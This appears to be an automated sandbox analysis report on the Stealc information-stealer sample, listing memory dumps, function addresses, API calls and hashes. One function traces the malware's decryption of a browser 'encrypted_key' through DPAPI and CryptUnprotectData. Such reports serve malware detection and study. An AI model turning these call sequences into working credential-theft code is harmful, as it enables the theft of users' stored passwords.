Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
Instruction ID: b120ba5b8a706af356c51775edc29c15c781579392118eff118098a875adc99c
Opcode Fuzzy Hash: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
Instruction Fuzzy Hash: 930162B0D40308BBDF10EBD4CC49B9EBB7DAB05701F308149E705BA6C0D7745A818B59

Function 00699CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,006A02E7,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(006A02E7), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39

Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00699D92

Part of subcall function 00699B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
Part of subcall function 00699B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
Part of subcall function 00699B60: memcpy.MSVCRT(?,?,?), ref: 00699BC6
Part of subcall function 00699B60: LocalFree.KERNEL32(?), ref: 00699BD3

Strings

DPAPI, xrefs: 00699D89
"encrypted_key":", xrefs: 00699D30
, xrefs: 00699DC1

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 85bff7f0c7e6322bf064b45a163c519b94834168d05048ceccac4b0db6c4450c
Instruction ID: 418344a535835f332b3399afb879ffec83034b482ab447853a45b21480258160
Opcode Fuzzy Hash: 85bff7f0c7e6322bf064b45a163c519b94834168d05048ceccac4b0db6c4450c
Instruction Fuzzy Hash: 56313DB5D10209ABCF04EBE8DC85AEEB7BABF49304F14451DE905A7241EB349A44CBA5

Function 6C0DC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C0DC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C0DC969
GetSystemInfo.KERNEL32(?), ref: 6C0DC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C0DC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C0DC9E2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: eec97b31dc0d5bb5d380d5a41a5da1ad4e8528a23d754c4de7cb3a5c6c3ae2c9
Instruction ID: e6edba3e50b45e9e6b1da8530a1757b6cffe4295a5610deccc2e10aa35914203
Opcode Fuzzy Hash: eec97b31dc0d5bb5d380d5a41a5da1ad4e8528a23d754c4de7cb3a5c6c3ae2c9
Instruction Fuzzy Hash: 6021F971741714ABDB14BB24DC88BAEB3F9AF4674CF61411AF917A7B80EB706C448B90

Function 006A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7E37
HeapAlloc.KERNEL32(00000000), ref: 006A7E3E
RegOpenKeyExA.KERNEL32(80000002,00A0B690,00000000,00020119,?), ref: 006A7E5E
RegQueryValueExA.KERNEL32(?,00A10B10,00000000,00000000,000000FF,000000FF), ref: 006A7E7F
RegCloseKey.ADVAPI32(?), ref: 006A7E92

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
Instruction ID: 40f2f7a19c7dc83b332553058dcd6db32e47d608c3aae60f407752f8016afc94
Opcode Fuzzy Hash: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
Instruction Fuzzy Hash: 8E115EB1A44205EBDB04DF94DD49FBBBBB9FB44B10F20425AFA06A7280D7745D018FA1

Function 006912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 006912B4
HeapAlloc.KERNEL32(00000000), ref: 006912BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 006912D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 006912F5
RegCloseKey.ADVAPI32(?), ref: 006912FF

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
Instruction ID: 38206bee60847987519ae06821527ca9d1d05efb49c410b999a8d359844ede43
Opcode Fuzzy Hash: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
Instruction Fuzzy Hash: E501E1B9A40208BBDB04DFE4DC49FAEB7BCFB48701F10825AFE1597280D6759A419F51

Function 006A0740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00A0D820), ref: 006A079A
StrCmpCA.SHLWAPI(00000000,00A0D980), ref: 006A0866
StrCmpCA.SHLWAPI(00000000,00A0D830), ref: 006A099D

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Strings

`_j, xrefs: 006A0A40, 006A0A54, 006A0803, 006A091B, 006A0806, 006A091E, 006A0A43

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_j
API String ID: 3722407311-668130287
Opcode ID: a66436addfe76a03907902e1fbae8c66d6aad5fa8008bf77cdce30fc1c47bc45
Instruction ID: 1380b86a52ef4e582a4c4bcce283d6cd3de3caf0a29d0c02076c40630457930a
Opcode Fuzzy Hash: a66436addfe76a03907902e1fbae8c66d6aad5fa8008bf77cdce30fc1c47bc45
Instruction Fuzzy Hash: 95914575A101089FCB58FF64D991AEE77BABF95300F50851DE80A9F241DB30DE05CB96

Function 006A0765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00A0D820), ref: 006A079A
StrCmpCA.SHLWAPI(00000000,00A0D980), ref: 006A0866
StrCmpCA.SHLWAPI(00000000,00A0D830), ref: 006A099D

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Strings

`_j, xrefs: 006A0803, 006A091B, 006A0806, 006A091E

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_j
API String ID: 3722407311-668130287
Opcode ID: 8a9c9908c43259a950a3d996fc3e137cdf4bd1c935613939d5a9d851f9eb6038
Instruction ID: 3c6fa0e18502b83d751663e7cdafcbace772e7630cb8aa7d5030efe3da74818d
Opcode Fuzzy Hash: 8a9c9908c43259a950a3d996fc3e137cdf4bd1c935613939d5a9d851f9eb6038
Instruction Fuzzy Hash: E7814475A102049FCB58EF64D991AEEB7B7BF95300F50851DE8099B241DB309E05CF86

Function 0069A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00A0D750,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,006A0153), ref: 0069A0BD
LoadLibraryA.KERNEL32(00A10D70,?,?,?,?,?,?,?,?,?,?,?,006A0153), ref: 0069A146

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA820: lstrlenA.KERNEL32(00000000,?,?,006A5B54,006B0ADB,006B0ADA,?,?,006A6B16,00000000,?,00A01348,?,006B110C,?,00000000), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(k,00000000), ref: 006AA885

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

SetEnvironmentVariableA.KERNEL32(00A0D750,00000000,00000000,?,006B12D8,?,006A0153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,006B0AFE), ref: 0069A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps, xrefs: 0069A0B2, 0069A0C6, 0069A0DC

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps
API String ID: 2929475105-127767437
Opcode ID: 26a44e9d39f3cf52751ca009d80d25d1ec82977ddfadbaefcce750f77e231409
Instruction ID: fd83b96be6aabe684d5fef3f9e3a921d3c8cdc8c062a22c8c754c506c0ecb41b
Opcode Fuzzy Hash: 26a44e9d39f3cf52751ca009d80d25d1ec82977ddfadbaefcce750f77e231409
Instruction Fuzzy Hash: D64141B1912104EFCB48EFA4FC45BAA37BABB19301F28021EF505936A1DB34D944CB57

Function 00696BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Jni,@Jni), ref: 00696C9F

Strings

@Jni, xrefs: 00696C80, 00696C83
Jni, xrefs: 00696BED, 00696C0D, 00696C8F
Jni, xrefs: 00696C1D, 00696C39, 00696C88, 00696C98, 00696C04, 00696C28, 00696C33

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
